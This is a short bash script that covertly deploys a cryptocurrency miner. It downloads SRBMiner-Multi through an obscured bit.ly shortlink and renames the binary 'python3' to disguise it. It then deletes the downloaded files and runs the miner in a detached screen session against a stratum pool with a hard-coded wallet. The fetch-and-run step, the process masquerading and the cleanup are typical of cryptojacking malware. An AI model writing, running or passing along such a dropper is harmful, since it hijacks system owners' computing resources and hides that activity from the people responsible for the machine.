#!/bin/bash

apt install screen -y
wget https://bit.ly/kontolrum 
tar -xf kontolrum
cd SRBMiner-Multi-2-4-7
mv SRBMiner-MULTI python3
mv python3* ~/
cd ..
rm -rvf SRBMiner-Multi-2-4-7
rm -rvf kontolrum
cd ~/
screen -dmS python3 ./python3 --algorithm aurum --pool stratum-asia.rplant.xyz:7114 --wallet waf1qs7djrfr2kj4w8qkylva5tr24500l3nael0l34g.DOTtest --keepalive true
